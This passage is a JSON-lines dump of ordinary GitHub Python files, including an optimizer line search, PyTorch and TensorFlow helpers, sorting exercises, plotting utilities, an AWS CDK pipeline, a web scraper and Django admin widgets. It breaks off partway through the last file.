+{"seq_id":"29155356002","text":"import numpy as np\nimport copy\n\nfrom .line_search import LineSearch\n\nclass Wolfe(LineSearch):\n \"\"\"\n Wolfe line search with optional resetting of the initial stepsize\n at each iteration. If resetting is used, the previous value is used\n as the first stepsize to try at this iteration. Otherwise, it starts\n with the maximal stepsize.\n Arguments:\n armijo_const (float, optional): proportionality constant for the armijo condition (default: 0.5)\n wolfe_const (float, optional): second proportionality constant for the wolfe condition (default: 0.5)\n start_with_prev_lr (boolean, optional): sets the reset option from (default: True)\n backtracking (float, optional): constant by which the current stepsize is multiplied (default: 0.5)\n \"\"\"\n \n def __init__(self, armijo_const=0.1, wolfe_const=0.9, strong=False, \n start_with_prev_lr=True, backtracking=0.5, *args, **kwargs):\n super(Wolfe, self).__init__(*args, **kwargs)\n self.armijo_const = armijo_const\n self.wolfe_const = wolfe_const\n self.strong = strong\n self.start_with_prev_lr = start_with_prev_lr\n self.backtracking = backtracking\n self.x_prev = None\n self.val_prev = None\n \n def armijo_condition(self, gradient, x, x_new):\n value_new = self.loss.value(x_new)\n self.x_prev = copy.deepcopy(x_new)\n self.val_prev = value_new\n descent = self.armijo_const * self.loss.inner_prod(gradient, x - x_new)\n return value_new <= self.current_value - descent + self.tolerance\n \n def curvature_condition(self, gradient, x, x_new):\n grad_new = self.loss.gradient(x_new)\n curv_x = self.loss.inner_prod(gradient, x - x_new)\n curv_x_new = self.loss.inner_prod(grad_new, x - x_new)\n if self.strong:\n curv_x, curv_x_new = np.abs(curv_x), np.abs(curv_x_new)\n return curv_x_new <= self.wolfe_const * curv_x + self.tolerance\n \n def __call__(self, x=None, x_new=None, gradient=None, direction=None):\n if gradient is None:\n gradient = self.optimizer.grad\n if x is None:\n x = self.optimizer.x\n if direction is None:\n direction = (x_new - x) / self.lr\n self.lr = self.lr if self.start_with_prev_lr else self.lr0\n if x_new is None:\n x_new = x + self.lr * direction\n if self.loss.is_equal(x, self.x_prev):\n self.current_value = self.val_prev\n else:\n self.current_value = self.loss.value(x)\n \n armijo_condition = self.armijo_condition(gradient, x, x_new)\n curvature_condition = self.curvature_condition(gradient, x, x_new)\n it_extra = 0\n it_max = min(self.it_max, self.optimizer.ls_it_max - self.it)\n while not armijo_condition and it_extra < it_max:\n self.lr *= self.backtracking\n x_new = x + self.lr * direction\n armijo_condition = self.armijo_condition(gradient, x, x_new)\n it_extra += 1\n if it_extra == 0:\n while not curvature_condition and it_extra < it_max:\n self.lr /= self.backtracking\n x_new = x + self.lr * direction\n curvature_condition = self.curvature_condition(gradient, x, x_new)\n it_extra += 1\n \n self.it += self.it_per_call + it_extra\n return x_new\n","repo_name":"konstmish/opt_methods","sub_path":"optmethods/line_search/wolfe.py","file_name":"wolfe.py","file_ext":"py","file_size_in_byte":3419,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"37"}
+{"seq_id":"26177466821","text":"import os\nfrom typing import Tuple\n\nimport pandas as pd\nfrom PIL import Image\nfrom torch import Tensor\nfrom torch.utils.data import Dataset, WeightedRandomSampler\nfrom torchvision.transforms import (\n ToTensor,\n Normalize,\n RandomHorizontalFlip,\n RandomVerticalFlip,\n)\nimport torch\n\n\ndef get_class_weights(n_samples, class_counts, unique_classes):\n class_weights = [1 - class_counts[cl] / n_samples for cl in unique_classes]\n class_weights = torch.tensor(\n class_weights,\n device=\"cuda\" if torch.cuda.is_available() else \"cpu\",\n dtype=torch.float32,\n )\n return class_weights\n\n\nclass PatchDataset(Dataset):\n def __init__(\n self,\n df: pd.DataFrame,\n transform=Normalize((0.485, 0.456, 0.406), (0.229, 0.224, 0.225)),\n augmentation=True,\n ) -> None:\n self.labels = df[\"class\"].to_numpy()\n unique_classes = sorted(df[\"class\"].unique())\n self.class_map = {cl: i for i, cl in enumerate(unique_classes)}\n self.img_paths = df[\"path\"].to_numpy()\n\n class_counts = df[\"class\"].value_counts()\n class_weights = {cl: 1 / class_counts[cl] for cl in unique_classes}\n sample_weights = [class_weights[cl] for cl in self.labels]\n\n self.weighted_sampler = WeightedRandomSampler(\n sample_weights, num_samples=len(self.img_paths)\n )\n\n self.transform = transform\n\n if augmentation:\n self.augmentation = torch.nn.Sequential(\n RandomVerticalFlip(0.5), RandomHorizontalFlip(0.5)\n )\n else:\n self.augmentation = None\n\n def __len__(self):\n return len(self.img_paths)\n\n def __getitem__(self, idx) -> Tuple[Tensor, int]:\n\n img_path = self.img_paths[idx]\n\n image = Image.open(img_path)\n image = ToTensor()(image)\n assert image.shape == torch.Size([3, 224, 224])\n if self.transform:\n image = self.transform(image)\n\n if self.augmentation:\n image = self.augmentation(image)\n\n label = self.labels[idx]\n\n return image, self.class_map[label]\n","repo_name":"fekstr/ds-lab","sub_path":"src/patch_dataset.py","file_name":"patch_dataset.py","file_ext":"py","file_size_in_byte":2117,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
+{"seq_id":"5307088532","text":"#插入排序\ndef insertSort(nums):\n for right in range(1,len(nums)):\n temp = nums[right]\n for left in range(right):\n if nums[right] < nums[left]:\n nums[left+1:right+1] = nums[left:right]\n nums[left] = temp\n break\n return nums\n\n\n\ndef swap(array,a,b):\n array[a],array[b] = array[b],array[a]\n\ndef partition(iList,start,end):\n pvriot = iList[start]\n p = start + 1\n q = end\n while p <= q:\n while p <= q and iList[p] < pvriot:\n p += 1\n while p <= q and iList[q] >= pvriot:\n q -= 1\n if p < q:\n swap(iList,p,q)\n swap(iList,start,q)\n return q\n\ndef quickSort(iList,start,end):\n if start >= end:\n return\n mid = partition(iList,start,end)\n quickSort(iList,start,mid-1)\n quickSort(iList,mid+1,end)\n return iList\n\nnum = [5,2,0,1,9,6,4,8]\nprint(quickSort(num,0,len(num)-1))","repo_name":"lxy1997430/data","sub_path":"10.23/复习.py","file_name":"复习.py","file_ext":"py","file_size_in_byte":932,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"17781772443","text":"\"\"\"InVision - Data visualization.\"\"\"\nimport git\nimport pandas as pd\nfrom matplotlib import pyplot as plt\nfrom sklearn.metrics import mean_absolute_error\n\n\ndef plot_time_series(\n data: pd.DataFrame,\n title: str,\n save: bool = False,\n filename: str = \"default\",\n show: bool = False,\n) -> plt.Figure:\n \"\"\"Plot time series.\n\n Args:\n data (pd.DataFrame): data to be plotted.\n title (str): title of the figure.\n save (bool): flag to save the plot.\n filename (str): filename.\n show (bool): flag to show the plot.\n\n Returns:\n plt.Figure: the figure with the time series.\n \"\"\"\n figure = plt.figure(figsize=(16, 9))\n plt.plot(data)\n plt.title(title)\n plt.xlabel(\"Time\")\n plt.grid(True)\n\n if save:\n repository: git.repo.base.Repo = git.Repo(\".\", search_parent_directories=True)\n root: str = repository.working_tree_dir\n plt.savefig(figure, root + f\"plot/{filename}.png\")\n\n if show:\n plt.show()\n\n plt.close()\n\n return figure\n\n\ndef plot_one_point_prediction(\n data: pd.DataFrame,\n title: str,\n save: bool = False,\n filename: str = \"default\",\n show: bool = False,\n) -> plt.Figure:\n \"\"\"Plot time series.\n\n Args:\n data (pd.DataFrame): data to be plotted.\n title (str): title of the figure.\n save (bool): flag to save the plot.\n filename (str): filename.\n show (bool): flag to show the plot.\n\n Returns:\n plt.Figure: the figure with the time series.\n \"\"\"\n figure = plt.figure(figsize=(16, 9))\n plt.plot(data[:-1])\n plt.plot(data[-1:], \"ro\", markersize=10)\n plt.title(title)\n plt.xlabel(\"Time\")\n plt.grid(True)\n\n if save:\n repository: git.repo.base.Repo = git.Repo(\".\", search_parent_directories=True)\n root: str = repository.working_tree_dir\n plt.savefig(figure, root + f\"plot/{filename}.png\")\n\n if show:\n plt.show()\n\n plt.close()\n\n return figure\n\n\ndef plot_moving_avg_smoothing(\n original_data: pd.DataFrame,\n rolling_data: pd.DataFrame,\n window: int,\n title: str,\n scale: float = 1.96,\n plot_intervals: bool = False,\n plot_anomalies: bool = False,\n save: bool = False,\n filename: str = \"default\",\n show: bool = False,\n) -> plt.Figure:\n \"\"\"Plot time series.\n\n Args:\n original_data (pd.DataFrame): original data.\n rolling_data (pd.DataFrame): rolling data.\n window (int): window used to smooth the time series.\n title (str): title of the figure.\n scale (float): scale for the standard deviation to be used.\n plot_intervals (bool): plot confidence intervals.\n plot_anomalies (bool): plot anomalies.\n save (bool): flag to save the plot.\n filename (str): filename.\n show (bool): flag to show the plot.\n\n Returns:\n plt.Figure: the figure with the time series.\n \"\"\"\n figure = plt.figure(figsize=(16, 9))\n plt.title(title + f\" window size {window}\")\n plt.xlabel(\"Time\")\n plt.grid(True)\n\n plt.plot(rolling_data, \"g\", label=\"Rolling mean trend\")\n plt.plot(original_data, label=\"Actual values\")\n\n # Plot confidence intervals for smoothed values\n if plot_intervals:\n mean_abs_error = mean_absolute_error(\n original_data[window:], rolling_data[window:]\n )\n deviation = (original_data[window:] - rolling_data[window:]).std()\n lower_bond = rolling_data - (mean_abs_error + scale * deviation)\n upper_bond = rolling_data + (mean_abs_error + scale * deviation)\n plt.plot(upper_bond, \"r--\", label=\"Upper Bond / Lower Bond\")\n plt.plot(lower_bond, \"r--\")\n\n # Having the intervals, find abnormal values\n if plot_anomalies:\n anomalies = pd.DataFrame(\n index=original_data.index, columns=original_data.columns\n )\n anomalies[original_data < lower_bond] = original_data[\n original_data < lower_bond\n ]\n anomalies[original_data > upper_bond] = original_data[\n original_data > upper_bond\n ]\n plt.plot(anomalies, \"ro\", markersize=10)\n\n plt.legend(loc=\"upper left\")\n\n if save:\n repository: git.repo.base.Repo = git.Repo(\".\", search_parent_directories=True)\n root: str = repository.working_tree_dir\n plt.savefig(figure, root + f\"plot/{filename}.png\")\n\n if show:\n plt.show()\n\n plt.close()\n\n return figure\n\n\ndef main():\n \"\"\"Main function of the module.\"\"\"\n pass\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"juanhenao21/job-application","sub_path":"src/job_application/InVision/visualization.py","file_name":"visualization.py","file_ext":"py","file_size_in_byte":4592,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"33059347775","text":"from aws_cdk import (\n Stage,\n Duration,\n Environment,\n Stack,\n pipelines as cdkpipe,\n aws_codepipeline as pipe,\n)\n\nfrom constructs import Construct\nfrom .europe_resources import DeployEuropeStage\nfrom .usa_resources import DeployUSAStage\n\n\n\nclass MainPipeline(Stack):\n\n def __init__(self, scope: Construct, construct_id: str, **kwargs) -> None:\n super().__init__(scope, construct_id, **kwargs)\n\n git_input = cdkpipe.CodePipelineSource.connection(repo_string=\"andreistavarache/aws-cdk-pipeline\",\n branch=\"main\",\n connection_arn=\"arn:aws:codestar-connections:us-east-1:061515210591:connection/2dfb975c-803a-4935-b3b9-f128cacdb419\"\n )\n pipeline = pipe.Pipeline(self, \"Pipeline\",\n pipeline_name=\"testing-pipeline-cdk\",\n cross_account_keys=False)\n synth = cdkpipe.ShellStep(\"Synth\",\n install_commands=[\n 'pip install -r requirements.txt'\n ],\n commands=[\n 'npx cdk synth'\n ],\n input=git_input\n )\n cdk_pipeline = cdkpipe.CodePipeline(self, \"CodePipeline\",\n code_pipeline=pipeline,\n synth=synth,\n self_mutation=True\n )\n deployment_wave = cdk_pipeline.add_wave(\"Deployment-wave\")\n deployment_wave.add_stage(DeployEuropeStage(self, 'DeployEuropeStage',\n env=Environment(account='061515210591', region='eu-west-1')\n ) \n )\n deployment_wave2 = cdk_pipeline.add_wave(\"Deployment-wave2\")\n deployment_wave2.add_stage(DeployUSAStage(self, 'DeployUSAStage',\n env=Environment(account='061515210591', region='us-east-1')\n ) \n )\n","repo_name":"andreistavarache/aws-cdk-pipeline","sub_path":"aws_cdk_pipeline/aws_cdk_pipeline_stack.py","file_name":"aws_cdk_pipeline_stack.py","file_ext":"py","file_size_in_byte":2420,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"13904390309","text":"# Normal måde\nf = open('test2.txt', 'r')\nprint(f.read())\nf.close()\n\n# Med comprehension\nwith open('test2.txt', 'r') as f:\n print(f.read())\n\n# Normal\na = []\nfor x in range(4):\n a.append(x+1)\nprint(a)\n\n# Comprehension\na = [x for x in [1, 2, 3, 4]]\nprint(a)\n\n# Normal\nl = []\nfor i in range(1, 10):\n l.append(i)\nprint(l)\n\n# Comprehension\nk = [i for i in range(1, 10)]\nprint(k)\n\n# Flere eksempler\n\nb = [x for x in range(1, 10) if x%2 == 0]\nprint(b)\n\nb = [x if x%2 == 0 else 'un-even' for x in range(1, 10)]\nprint(b)\n\n# Nested Loops\n\nl = []\nfor i in range(3):\n for j in range(2):\n l.append((i, j))\nprint(l)\n\nl = [(i,j) for i in range(3) for j in range(2)]\nprint(l)","repo_name":"HolmQ84/PythonExercises","sub_path":"venv/Week 37/List Comprehension.py","file_name":"List Comprehension.py","file_ext":"py","file_size_in_byte":680,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"40489767997","text":"\n# procedure for testing:\n# go to root directory and run $ pip install -e .\n# go to tst/ and run pytest\n\n\nimport pytest\nimport PixelSky as pxs\nimport numpy as np\n\ndef test_radial_profile_N():\n #{{{\n \"\"\"\n test_radial_profile(self):\n test the construction of the partition for the radial\n profile\n\n Tasks:\n\n Args:\n\n Raises:\n errors?\n\n Returns:\n \"\"\"\n import astropy.units as u\n\n rp = pxs.RadialProfile()\n N = 10\n rp.set_breaks(unit=u.arcmin, start=0., stop=30., num=N)\n assert rp.N == (N-1)\n #}}}\n\ndef test_radial_profile_linspace():\n #{{{\n \"\"\"\n test_radial_profile_linspace(self):\n test the construction of the partition for the radial\n profile using the linspace function from the numpy\n package.\n\n Tasks:\n\n Args:\n\n Raises:\n errors?\n\n Returns:\n \"\"\"\n import astropy.units as u\n\n rp = pxs.RadialProfile()\n N = 10\n rp.set_breaks(unit=u.arcmin, start=0., stop=30., num=N, endpoint=True)\n assert rp.N == (N-1)\n #}}}\n\ndef test_load_config_1():\n #{{{\n sys_args = ['python','../set/config_small.ini']\n filename = pxs.check_file(sys_args)\n assert isinstance(filename, str)\n\ndef test_load_config_2():\n #{{{\n sys_args = ['../set/config_small.ini']\n with pytest.raises(SystemExit):\n pxs.check_file(sys_args)\n \ndef test_load_config_3():\n #{{{\n sys_args = ['../set/nonexistentfile.ini']\n with pytest.raises(SystemExit):\n pxs.check_file(sys_args)\n\n\n\n #config = pxs.check_file(['python','../set/config_small.ini']) \n #with pytest.raises(SystemExit):\n # config.load_config()\n #}}}\n\n#def test_load_config_2():\n# #{{{\n# config = pxs.check_file(['python','../set/non_existent_file.ini']) \n# with pytest.raises(SystemExit):\n# config.load_config()\n# #}}}\n# \n#def test_load_config_3():\n# #{{{\n# config = pxs.check_file([]) \n# with pytest.raises(SystemExit):\n# config.load_config()\n# #}}}\n# \n#def test_load_config_4():\n# #{{{\n# config = pxs.check_file([\"hola\", \"file\", \"another\"]) \n# with pytest.raises(SystemExit):\n# config.load_config()\n# #}}}\n# \n#def test_load_config_pars():\n# #{{{\n# config = pxs.check_file(['','../set/config_small.ini']) \n# config.load_config()\n\n #}}}\n \n\n\n#\n#def test_radial_profile_average(self):\n# #{{{\n# import pandas as pd\n# import healpy as hp\n# import numpy as np\n# from astropy import units as u\n#\n# import time\n#\n# # Read CMB temperature map\n# nside = 512\n# mapa = pxs.SkyMap(nside)\n# mask = pxs.SkyMap(nside)\n#\n# filename = '../dat/lensmap512_10arcmin_y2.fits'\n# mapa.load(filename, field=(0))\n# filename = '../dat/lensmask512_10arcmin_y2.fits'\n# mask.load(filename, field=(0))\n#\n# # set the map at a fixed value of 1.\n# value = 1.\n# mapa.data = mapa.data*0. + value\n#\n# # Read galaxy catalog\n# glx_catalog = '../dat/2mrs_1175_done.dat'\n# glx = pd.read_csv(glx_catalog, delim_whitespace=True, header=9)\n# # catalog: http://tdc-www.harvard.edu/2mrs/2mrs_readme.html\n#\n# phi_healpix = glx['RAdeg']*np.pi/180.\n# theta_healpix = (90. - glx['DECdeg'])*np.pi/180.\n# glx['vec'] = hp.ang2vec(theta_healpix, phi_healpix).tolist()\n#\n# # filter galaxy catalog\n# l = ['A','X','B']\n# spiral = [any([s in x for s in l]) for x in glx['type']]\n# edgeon = glx['b/a'] < 0.8\n# subset = spiral & edgeon\n# centers = np.array(list(glx.vec[subset]))\n#\n# rp = pxs.RadialProfile()\n# rp.set_breaks(unit=u.arcmin, start=0., stop=30., num=5)\n#\n# res = rp.radialprofile_II(centers, mapa, mask) \n#\n# rp.signal = np.mean(res, 1)\n#\n# self.assertEqual(rp.signal, value)\n# #}}}\n#\n#\n","repo_name":"mlares/CBR_CrossCorr","sub_path":"test/test_IO.py","file_name":"test_IO.py","file_ext":"py","file_size_in_byte":3724,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"4245025325","text":"import requests\nfrom bs4 import BeautifulSoup\n\nURL = \"https://web.archive.org/web/20200518073855/https://www.empireonline.com/movies/features/best-movies-2/\"\n\n# Write your code below this line 👇\nresponse = requests.get(URL)\nmovie_webpage = response.text\n\nsoup = BeautifulSoup(movie_webpage, \"html.parser\")\n\ntitles = soup.find_all(name=\"h3\", class_=\"title\")\n\nfor title in titles:\n print(title.string)","repo_name":"BryantLogan/100-days-of-python","sub_path":"Day 45 - Web Scraping/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":405,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"31707916","text":"import tensorflow as tf\n\n@tf.function\ndef split_indices(dim_length,sections):\n '''\n Provides indices to split a dim_length size array into several roughly equally sized bins\n\n Inputs:\n -dim_length: int or tf.Constant. Size of the array\n -sections: Number of sections to create\n\n Outputs:\n -section_indices: tf.Tensor of shape (sections,) (Pythonic) indices where each bin should start/end. E.g. for dim_length 229 and sections we get [0 58 115 172 229] so bin 0 should be x[0:58], bin 1 should be [58:115] and so forth.\n '''\n elements_per_section = dim_length // sections\n extras = dim_length % sections\n \n sections_with_extras = tf.expand_dims(elements_per_section+1,0)\n sections_with_extras = tf.tile(sections_with_extras,[extras])\n \n sections_without_extras = tf.expand_dims(elements_per_section,0)\n sections_without_extras = tf.tile(sections_without_extras,[sections-extras])\n \n section_sizes = tf.concat([[0], sections_with_extras,sections_without_extras],0)\n \n return tf.math.cumsum(section_sizes)\n\nif __name__ == '__main__':\n d = tf.constant(229)\n s = tf.constant(4)\n print(split_indices(d,s))\n","repo_name":"aligirayhanozbay/poisson_CNN","sub_path":"poisson_CNN/dataset/utils/split_indices.py","file_name":"split_indices.py","file_ext":"py","file_size_in_byte":1170,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"37"}
+{"seq_id":"33892747436","text":"from time import sleep\nfrom queue import Queue\nfrom threading import Thread\n\ndef producer(q, n):\n for i in range(n):\n q.put(i)\n sleep(5)\n q.put(None)\n\ndef consumer(q):\n while True:\n print(\"Wait...\")\n item = q.get()\n if item is None:\n break\n\n print(\"Got:\", item)\n\n\nq = Queue()\nThread(target=producer, args=(q,10)).start()\nThread(target=consumer, args=(q,)).start()\n","repo_name":"monarin/divelite","sub_path":"python3/asyncio/just_threads.py","file_name":"just_threads.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"8621208781","text":"from itertools import chain\nfrom django import forms\nfrom django.conf import settings\nfrom django.utils.encoding import force_unicode\nfrom django.utils.safestring import mark_safe\nfrom django.utils.html import escape, conditional_escape\nfrom django.forms.utils import flatatt\nfrom tinymce import TinyMCE\n\nfrom djangoplicity.contrib.admin.templatetags import djangoplicity_admin_utils as djau\n\n\n#\n# Setup settings attributes in case they haven't been specified\n#\nclass HierarchicalSelect( forms.Widget ):\n \"\"\"\n A Widget for displaying ForeignKey for a django-mptt model so that the tree structure is\n apparent rather than a normal flat box.\n\n This is more or less a copy of django.newforms.widgets.Select\n \"\"\"\n\n def __init__(self, attrs=None, choices=()):\n super(HierarchicalSelect, self).__init__(attrs)\n # choices can be any iterable, but we may need to render this widget\n # multiple times. Thus, collapse it into a list so it can be consumed\n # more than once.\n self.choices = list(choices)\n\n def render(self, name, value, attrs=None, choices=()):\n if value is None:\n value = ''\n if attrs is None:\n attrs = {}\n final_attrs = self.build_attrs(attrs, {'name': name})\n output = [u'')\n return mark_safe(u'\\n'.join(output))\n\n\nclass AdminRichTextAreaWidget(TinyMCE):\n def use_required_attribute(self, *args):\n return False\n\n\n\nclass RelationForeignKeyRawIdWidget(forms.TextInput):\n \"\"\"\n A Widget for displaying ForeignKeys in the \"raw_id\" interface rather than\n in a